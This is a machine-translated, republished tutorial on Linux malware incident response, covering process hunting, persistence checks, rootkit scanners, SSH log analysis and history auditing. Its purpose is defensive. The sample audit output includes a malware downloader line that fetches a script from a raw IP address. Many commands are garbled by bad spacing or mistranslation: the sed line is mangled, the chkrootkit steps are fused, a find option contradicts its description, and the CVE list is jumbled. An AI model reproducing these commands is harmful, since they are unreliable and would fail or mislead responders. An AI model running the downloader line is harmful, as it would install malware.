Shulou(Shulou.com)05/31 Report--

This article mainly introduces what Linux emergency response skills have, which can be used for reference by interested friends. I hope you will gain a lot after reading this article. Let's take a look at it.

Overview

Dealing with emergency response events in Linux environment is often more difficult, because compared with Windows,Linux, there is no emergency response weapon such as Autorun, procexp, and there is no unified emergency response processing process. Therefore, this article will explain the emergency response process in Linux environment, and provide shell commands used in each link to help you deal with viruses in Linux environment quickly and systematically.

Dealing with Linux emergency response is mainly divided into these four links: identifying phenomenon-> removing virus-> closed-loop backing-> system reinforcement.

First of all, starting from the abnormal phenomenon of the host in the user scenario, we first identify the suspicious phenomenon of the virus.

Then locate the specific virus process and virus files, and remove them.

It is not enough to complete the first two steps, the virus will usually be re-infected through some self-startup items and daemons, so we need to perform a closed loop to ensure that the virus is no longer created.

After cleaning up the virus items on the host, the system is finally hardened to prevent the virus from invading again from the Web.

After these four links, it can be regarded as the end of an emergency response process.

Recognition phenomenon

The first step requires us to find the abnormal phenomena of the host and confirm the suspicious behavior of the virus through the running status of the system and the alarm of the security equipment.

Is the system CPU abnormal?

Enumerate processes, CPU descending sort: top

If the CPU occupancy rate is more than 70% and the name is suspicious, it is likely to be a mining virus.

Whether there is a suspicious process

Enumerate the process command line: ps-aux

Viruses usually carry suspicious command lines. When you find strange strings such as url on the command line, you should be aware that it is probably a virus downloader.

Is there an alarm in the security gateway?

Identifying the threat from the security gateway alarm is the most direct, but confirming that the host has been infected with the virus is only the first step, and the next step is to locate which process is communicating with ClearC.

Monitor the process of communicating with the target IP:

While true; do netstat-antp | grep [ip]; done

Sometimes the security gateway detects not all malicious IP, but also a domain name. In this case, the IP corresponding to the domain name changes, and we cannot directly use the above method to monitor.

We can first add a rule to the host file to redirect the malicious domain name to a random IP address, and then monitor it.

In this way, you can get the malicious process of communicating with it.

Are there any suspicious history orders?

Traverse the host history command to find out if there are any malicious commands: history

Clear the virus

The process information traced back to the first step will help us locate the virus process-virus files and achieve cleanup.

End the virus process

Clear the process chain for suspicious processes:

Ps-elf | grep [pid] kill-9 [pid]

Delete virus files

Locate the file path corresponding to the virus process:

Ls-al / proc/ [pid] / exe rm-f [exe_path]

Closed loop pocket bottom

The persistence mode of virus under Linux is less than that of Windows, mainly in the following four ways.

Check if there are suspicious scheduled tasks

Enumerate timing tasks: crontab-l

View anacron async scheduled tasks: cat/etc/anacrontab

Check if there are suspicious services

Enumerate all the services of the host to see if there are any malicious services:

Service--status-all

Check whether the system files are hijacked

Enumerate the files in the system folder and view the files that have been modified within 7 days in the order of modification events:

Find / usr/bin/ / usr/sbin/ / bin/ / usr/local/bin/-type f-mtime + 7 | xargs ls-la

Check for the existence of virus daemons

Monitoring the behavior of daemons: lsof-p [pid]

Strace-tt-T-etrace=all-p$pid scan for malicious drivers

Enumerate / scan system drivers: lsmod

Install chkrootkit to scan:

Wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gztar zxvf chkrootkit.tar.gzcd chkrootkit-0.52make sense./chkrootkit

Install rkhunter to scan:

Wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz

Tar-zxvf rkhunter-1.4.4.tar.gz

Cd rkhunter-1.4.4

. / installer.sh-- install

Rkhunter-c

The last step is easy for everyone to forget. 90% of the viruses on the Linux platform are infected through the network. Therefore, most of the reasons why your host is infected with the virus are due to the lack of Web security protection, so check it quickly.

Modify SSH weak password

Query the login log of log host:

Grep "Accepted" / var/log/secure* | awk'{print $1, 2, 3, 9, 11}'

Locate the source IP of the blasting:

Grep "Failed password" / var/log/secure | grep-E-o (25 [0-5] | 2 [0-4] [0-9] | [01]? [0-9] [0-9]?)\. (25 [0-5] | 2 [0-4] [0-9] | [01]? [0-9] [0-9]?)\. (25 [0-5] | 2 [0-4] [0-9] | [01]? [0-9] [ 0-9]?)\. (25 [0-5] | 2 [0-4] [0-9] | [01]? [0-9] [0-9]?) "| uniq-c

The username and password of the blasting log:

Grep "Failed password" / var/log/secure | perl-e 'while ($_ =) {/ for (. *?) from/; print "$1\ n";}' | uniq-c | sort-nr

SSH blasting is the most commonly used means of transmission of Linux virus. If a host with a weak password is easily blown up by other infected hosts SSH, the virus will be infected again.

Add command audit

Add information such as login IP address, execution time and so on for historical commands:

[1] Save 10,000 commands:

Sed-I's / ^ HISTSIZE = 1000Universe HISTSIZEHISTSIZE 10000GN / etc/profile

[2] add the following line number configuration information at the end of the / etc/profile file:

USER_IP= `who-u ami 2 > / dev/null | awk'{print $NF}'| sed-e's / [()] / / g``if ["$USER_IP" = ""] then USER_IP= `hostname`fi export HISTTIMEFORMAT= "% F% T $USER_IP `whoami`" shopt-s histappend export PROMPT_COMMAND= "history-a"

[3] make the configuration effective:

Source / etc/profile

Generate the effect:

762019-10-2817 sh 05sh 34113.110.229.230 wget-Q-T180-O-http://103.219.112.66:8000/i.sh) | patches of common Web vulnerabilities structs2 series RCE vulnerabilities Redis unauthorized access vulnerabilities (CVE_2019_3396) DrupalRCE vulnerabilities (CVE-2018-7600) ThinkPHPRCE vulnerabilities (CVE-2019-9082) Thank you for reading this article carefully I hope the article "what are the Linux emergency response skills" shared by the editor will be helpful to you. At the same time, I also hope that you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.